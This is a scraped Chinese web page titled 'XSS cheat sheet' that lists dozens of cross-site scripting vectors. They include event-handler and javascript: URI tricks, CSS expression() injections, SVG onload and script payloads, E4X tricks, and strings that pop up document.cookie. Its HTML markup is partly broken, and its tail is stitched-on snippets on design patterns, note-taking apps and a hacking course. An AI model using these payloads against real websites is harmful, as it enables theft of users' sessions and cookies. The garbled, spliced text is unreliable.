XSS备忘录

CLICK // window.opener will be null CLICK // window.opener will be null // window.opener still works // window.opener still works CLICKME// window.opener still works CLICKME// window.opener still works

some content without two new line \n\n Content-Type: multipart/related; boundary="******"some content without two new line --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg --******--

</div> <script>d.innerHTML+='';</script>  <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/ea7e47b519794dad8823e2ceb4068c70.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ea7e47b519794dad8823e2ceb4068c70.jpg" width="650" height="40"></a></p> <pre class="has"><code class="language-php"><img[a][b]src=x[d]onerror[c]=[e]"alert(1)"> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/cdd9210da8d84c188ed3ec93019d44ba.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/cdd9210da8d84c188ed3ec93019d44ba.jpg" width="650" height="56"></a></p> <pre class="has"><code class="language-php"><a href="[a]java[b]script[c]:alert(1)">XXX</a> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/fc9852cddb014522a0dc4dfb3528046f.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/fc9852cddb014522a0dc4dfb3528046f.png" width="614" height="85"></a></p> <pre class="has"><code class="language-php"><img src="x` `<script>alert(1)</script>"` `> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/011d993b094841039fe3d0f7191b7f2d.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/011d993b094841039fe3d0f7191b7f2d.png" width="538" height="88"></a></p> <pre class="has"><code class="language-php"><img src onerror /" '"= alt=alert(1)//"> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/303875b1cff143f4b0c423957cba7794.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/303875b1cff143f4b0c423957cba7794.png" width="587" height="98"></a></p> <pre class="has"><code class="language-php"><title onpropertychange=alert(1)></title><title title=></title> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/f141780286fa47d8905f2117a2e93f32.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/f141780286fa47d8905f2117a2e93f32.png" width="537" height="86"></a></p> <pre class="has"><code class="language-php"> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">  <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//"> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/6075af6bf1b64cc8ba9dd3980fc13897.png" width="0" height="0"></p> <pre class="has"><code class="language-php">  </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/c9134c5f100545bc9441017405f870e5.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c9134c5f100545bc9441017405f870e5.jpg" width="405" height="87"></a></p> <pre class="has"><code class="language-php"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0 </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/5abb5bf0e3154c15a3aba68011f68a81.png" width="0" height="0"></p> <pre class="has"><code class="language-php"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/4a45ffef17614979a5ba3bfa78884c1b.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/4a45ffef17614979a5ba3bfa78884c1b.png" width="429" height="86"></a></p> <pre class="has"><code class="language-php">{} *{color:red}</style> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/eb2c95a3b8f142738ece62029ccc8360.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/eb2c95a3b8f142738ece62029ccc8360.jpg" width="650" height="56"></a></p> <pre class="has"><code class="language-php"><frameset onpageshow="alert(1)"> <body onpageshow="alert(1)"> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/2d17d679a1444a31b30c6523cd22fbe1.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/2d17d679a1444a31b30c6523cd22fbe1.png" width="672" height="91"></a></p> <pre class="has"><code class="language-php"><applet onerror="alert(1)"></applet> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/b73ce529dfa34bce9d348cc10ba6f2c3.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/b73ce529dfa34bce9d348cc10ba6f2c3.png" width="336" height="95"></a></p> <h3><span>基于CSS注入的向量</span></h3> <pre class="has"><code class="language-php"><a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/beac6ad8e5144cc59d7b28f7a0c51856.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/beac6ad8e5144cc59d7b28f7a0c51856.png" width="426" height="93"></a></p> <pre class="has"><code class="language-php"><style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/d6da6dfecebb4dd796014bc92c885859.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/d6da6dfecebb4dd796014bc92c885859.png" width="603" height="81"></a></p> <pre class="has"><code class="language-php"><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/92b54bb2276042bfbf38b75ed6780c2b.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/92b54bb2276042bfbf38b75ed6780c2b.png" width="752" height="94"></a></p> <pre class="has"><code class="language-php"><style>@import "data:,*%7bx:expression(write(1))%7D";</style> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/14b38b73b3ad473d967517fcf7b436cc.png" width="0" height="0"></p> <pre class="has"><code class="language-php"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/7be9bc0b9ec64e0dbcff7c3f41fadc8e.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7be9bc0b9ec64e0dbcff7c3f41fadc8e.jpg" width="650" height="50"></a></p> <pre class="has"><code class="language-php"><style>*[{}@import'test.css?]{color: green;}</style>X </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/1c6884173e0742778b752dd39432b5a5.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/1c6884173e0742778b752dd39432b5a5.png" width="500" height="84"></a></p> <pre class="has"><code class="language-php"><div style="font-family:'foo[a];color:red;';">XXX</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/b8b8703256f44b1ba4b651d6643f9c2f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b8b8703256f44b1ba4b651d6643f9c2f.jpg" width="650" height="48"></a></p> <pre class="has"><code class="language-php"><div style="font-family:foo}color=red;">XXX</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/3c593148cf0d431b9a2335d59ebd2eb2.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/3c593148cf0d431b9a2335d59ebd2eb2.png" width="597" height="98"></a></p> <pre class="has"><code class="language-php"><div style="[a]color[b]:[c]red">XXX</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/d2986a8efbef4363a8fb29caff394beb.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d2986a8efbef4363a8fb29caff394beb.jpg" width="650" height="54"></a></p> <pre class="has"><code class="language-php"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/1626a71bf79b41ca87d3111c77dd5ecb.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/1626a71bf79b41ca87d3111c77dd5ecb.jpg" width="650" height="48"></a></p> <pre class="has"><code class="language-php"><// style=x:expression\28write(1)\29> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/bba32962cca94a358b12cd6b0f0a4842.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/bba32962cca94a358b12cd6b0f0a4842.png" width="780" height="82"></a></p> <pre class="has"><code class="language-php"><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(write(1))}</style> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/e01a17bb6ad04ee4bab98b2faaa04060.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/e01a17bb6ad04ee4bab98b2faaa04060.png" width="761" height="74"></a></p> <pre class="has"><code class="language-php"> <div style=content:url(test2.svg)></div>   <div style="background:url(test5.svg)">PRESS ENTER</div> </code></pre> <pre class="has"><code class="language-php"><form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">  <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/2f7674bb7f0f4f9bac9137860a2fcd15.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/2f7674bb7f0f4f9bac9137860a2fcd15.png" width="373" height="80"></a></p> <pre class="has"><code class="language-php"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/48e3371ff23146ec8df4e8be527f79db.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/48e3371ff23146ec8df4e8be527f79db.png" width="478" height="78"></a></p> <pre class="has"><code class="language-php"><div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/e84f22f1072e4464a37844700a565dc9.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/e84f22f1072e4464a37844700a565dc9.png" width="433" height="87"></a></p> <pre class="has"><code class="language-php">XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/d7fc3ec4091540e2ae1bccc22fc00f69.jpg" width="0" height="0"></p> <pre class="has"><code class="language-php"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/a440f52121bc46ba90c297b52cd33013.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/a440f52121bc46ba90c297b52cd33013.png" width="447" height="79"></a></p> <pre class="has"><code class="language-php"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/a63844a619894cf4bdde31a10827c820.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/a63844a619894cf4bdde31a10827c820.png" width="429" height="79"></a></p> <pre class="has"><code class="language-php"><div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/d667b013182048688a933a118be72cca.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d667b013182048688a933a118be72cca.jpg" width="650" height="62"></a></p> <pre class="has"><code class="language-php"><x style="background:url('x[a];color:red;/*')">XXX</x> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/7cef78e60496424984edf9c36de08a3e.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/7cef78e60496424984edf9c36de08a3e.png" width="515" height="76"></a></p> <h3><span>纯javascript的向量</span></h3> <pre class="has"><code class="language-php"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/26f6358ad021488f98c4ca5fd19e3648.png" width="0" height="0"></p> <pre class="has"><code class="language-php"><script>({0:#0=alert/#0#/#0#(0)})</script> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/0936d6494ca948d8a59137f562d4b831.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/0936d6494ca948d8a59137f562d4b831.png" width="441" height="78"></a></p> <pre class="has"><code class="language-php"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/dff4d5fcd5e84aeea77e261c1bfb4e86.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/dff4d5fcd5e84aeea77e261c1bfb4e86.png" width="638" height="77"></a></p> <pre class="has"><code class="language-php"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/42014abc351946288eda2033e4df5142.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/42014abc351946288eda2033e4df5142.png" width="515" height="75"></a></p> <pre class="has"><code class="language-php"><script>history.pushState(0,0,'/i/am/somewhere_else');</script> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/e6eecc05d85a4e0db3273742651c4c19.jpg" width="0" height="0"></p> <pre class="has"><code class="language-php"><script> alert`1`; var something = `abc${alert(1)}def`; ``.constructor.constructor`alert\`1\````; </script> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/05162b0a2c6b4610b7d43ac53d886db9.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/05162b0a2c6b4610b7d43ac53d886db9.png" width="363" height="76"></a></p> <h3><span>E4X向量</span></h3> <pre class="has"><code class="language-php"><script src="#">{alert(1)}</script>;1</code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/2c5e44c160834cb2bfb95728f5a1c18e.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/2c5e44c160834cb2bfb95728f5a1c18e.png" width="503" height="80"></a></p> <pre class="has"><code class="language-php">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><img src="http://img.e-com-net.com/image/info8/7191b04f41fd4bd988ce1b74de15287b.png" width="0" height="0"></p> <pre class="has"><code class="language-php"><b><script<b></b><alert(1)</script </b></b> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/8b04b32ee0e54f3d836ce5ca034d876a.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/8b04b32ee0e54f3d836ce5ca034d876a.png" width="386" height="70"></a></p> <pre class="has"><code class="language-php"><script<{alert(1)}/></script </> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/8746301a70dd42e3a42056e0d9ea1159.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/8746301a70dd42e3a42056e0d9ea1159.png" width="401" height="76"></a></p> <h3><span>DOM属性与方法的攻击向量</span></h3> <pre class="has"><code class="language-php">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/e3e174b471404c018c65c697cf840eca.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/e3e174b471404c018c65c697cf840eca.png" width="424" height="78"></a></p> <pre class="has"><code class="language-php"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/b6971fba2d8c47ea8d2a7fa6a55d9c12.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/b6971fba2d8c47ea8d2a7fa6a55d9c12.png" width="429" height="76"></a></p> <h3><span>基于JSON的向量</span></h3> <pre class="has"><code class="language-php"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/b2cf7a0face948629e7059901dd1deb2.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/b2cf7a0face948629e7059901dd1deb2.png" width="511" height="77"></a></p> <h3><span>SVG内的向量</span><br></h3> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/6ef9c675529247939a068a801f4d7977.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/6ef9c675529247939a068a801f4d7977.jpg" width="650" height="51"></a></p> <pre class="has"><code class="language-php"><?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html> </code></pre> <pre class="has"><code class="language-php"><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg></code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/9ccfb6ffcf9240769128e5ffbf0ad753.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/9ccfb6ffcf9240769128e5ffbf0ad753.png" width="385" height="72"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/be10a21d990f44508b1bea02a3457e0a.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/be10a21d990f44508b1bea02a3457e0a.jpg" width="650" height="57"></a></p> <pre class="has"><code class="language-php"><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/226be345b0a3495198d5627ff21584f5.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/226be345b0a3495198d5627ff21584f5.jpg" width="650" height="49"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/d63fb5ac34aa42b8b29d2a2e9cb21ed3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d63fb5ac34aa42b8b29d2a2e9cb21ed3.jpg" width="650" height="53"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(1)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(1)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/e5e5c256ce2141cda2091f984df2cbdd.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/e5e5c256ce2141cda2091f984df2cbdd.png" width="311" height="73"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/385381cb12704704a214827ae6ed3f44.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/385381cb12704704a214827ae6ed3f44.png" width="360" height="73"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/1222c17fd0e14889ae1b3293038933b5.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/1222c17fd0e14889ae1b3293038933b5.png" width="282" height="77"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/e1a21eed30474eeaaaf1836fcbad4161.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/e1a21eed30474eeaaaf1836fcbad4161.png" width="402" height="76"></a></p> <pre class="has"><code class="language-php"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg> </code></pre> <p><span>适用浏览器</span></p> <p style="text-align: center"><a href="http://img.e-com-net.com/image/info8/f4196b0e2a75499d9843b61a7e6f3377.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/f4196b0e2a75499d9843b61a7e6f3377.png" width="457" height="78"></a></p> <pre class="has"><code class="language-php"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03">

drag and drop one of the following strings to the drop box: jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// + Drop Box +

设计模式 23 访问者模式 WineMonk #设计模式设计模式访问者模式
设计模式23创建型模式（5）：工厂方法模式、抽象工厂模式、单例模式、建造者模式、原型模式结构型模式（7）：适配器模式、桥接模式、组合模式、装饰者模式、外观模式、享元模式、代理模式行为型模式（11）：责任链模式、命令模式、解释器模式、迭代器模式、中介者模式、备忘录模式、观察者模式、状态模式、策略模式、模板方法模式、访问者模式文章目录设计模式23访问者模式（VisitorPattern）1定义2结构3
Prism 教程 yang_B621 Prism IOC
http://t.csdnimg.cn/VXSSvhttps://blog.csdn.net/u010476739/article/details/119341731Prism-随笔分类-Hello——寻梦者！-博客园(cnblogs.com)C#IoC学习笔记-缥缈的尘埃-博客园(cnblogs.com)WPF_SchuylerEX的博客-CSDN博客
Apache POI用法 JH3073 apache
一、ApachePOI是什么ApachePOI是用Java编写的免费开源的跨平台的JavaAPI，ApachePOI提供API给Java程序对MicrosoftOffice格式档案读和写的功能，其中使用最多的就是使用POI操作Excel文件。二、POI结构HSSF－提供读写MicrosoftExcelXLS格式档案的功能XSSF－提供读写MicrosoftExcelOOXMLXLSX格式档案的功能
这个桌面日历真不错笔记提醒生日记录打卡翻译都有真的太方便了！ C盘清理实用软件笔记待办日历桌面日历电脑日历生日提醒记事本
这个桌面日历真不错笔记提醒生日记录打卡翻译都有真的太方便了！日历产品非常的多，如何选择一个合适自己的桌面日历，这个很重要，今天小编给大家介绍这个芝麻日历，一起看下它有些什么功能，是不是你需要的。1、美观，一个实用的桌面日历，不仅要界面美观，还要功能强大；芝麻日历（https://rili.zhimasoft.cn/?abiw）芝麻日历下载实用的桌面日历万年历农历查询桌面便签/备忘录芝麻日历软件官方
iPhone备忘录清除缓存 HaloHoohoo 问题 iphone ios 缓存
前言离剁手只有一张图，就是：遇到问题就去找方法，找方法就要找问题源头，经过我不懈的努力，我终于找到了万恶之源——备忘录。奇怪的是我的东西并不多，而且写图文总结的备忘录，一般都会放在iCloud上，前几日我一直是觉得自己的图片放得太多才导致如此，但狂删除的举动反而让其占用的存储更大了些，我震惊并生气。遂在几次连相机都打不开的时候怒摔（伪）手机并扬言13出来就把你扔了，只是13还得等，日子还得过，微信
如何把小米手机便签内容云同步到iPhone XS上? weixin_34220179
云同步指的是在云平台上以个人为中心的不同设备之间数据共享。那么小米手机与iPhoneXS都是支持用户个人云服务的设备，两款手机上备忘的内容能够实现共享吗？答案显而易见，不可以。因为两款手机系统不同，用来备忘的软件也不同，iPhonexs是以备忘录作为备忘软件，而小米用手机便签。那如何才能让小米手机与iPhoneXS手机实现备忘内容的云同步呢？可以通过能够多端云同步的敬业签来实现。敬业签云便签能够跨
已经导出到电脑的荣耀手机便签如何打开匠心� virtualenv
手机便签往往记录着我们生活和工作中容易遗忘的信息，荣耀手机又比较耐用，用个两三年没有问题。两三年的时间，足以让我们在便签上记录很多内容了。如果需要在电脑上查看手机便签内容，该如何操作？如果已经导出到电脑上的手机便签内容，该如何打开？现在这篇文章就来详细解答一下这个问题。荣耀手机自带的便签叫备忘录，如果要把备忘录的内容传输到电脑上，用华为云账号就可以了。先在手机上把备忘录内容备份到云账号，然后在百度
最新网络安全（黑客）——自学篇黑客小雨 web安全安全
*需要的小伙伴关注我第一阶段：基础操作入门，学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍，一般来说这个过程在1个月左右比较合适。在这个阶段，你已经对网络安全有了基本的了解。如果你学完了第一步，相信你已经在理论上明白了上面是sql注入，什么是xss攻击，对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基！所谓的“打地基”其实就是系统化的
备忘录模式（Memento）疯狂的阿吉 c++设计模式设计模式
目录前言一、备忘录模式总结1、模式意图2、参与者3、结构、协作、适用性及效果二、备忘录模式简单示例1、用例描述2、示例代码总结前言本周五参加了Memento（备忘录）模式研讨会，本文的目的是对这个模式的总结和分享，希望对需要学习这个设计模式的同学有所帮助。本文一共分为两个部分，第一个部分是备忘录模式的基础知识总结；第二个部分是分享备忘录模式简单示例。一、备忘录模式总结1、模式意图在不破坏封装性的前
java设计模式---中介者模式奔跑的扫地僧 Java设计模式 java
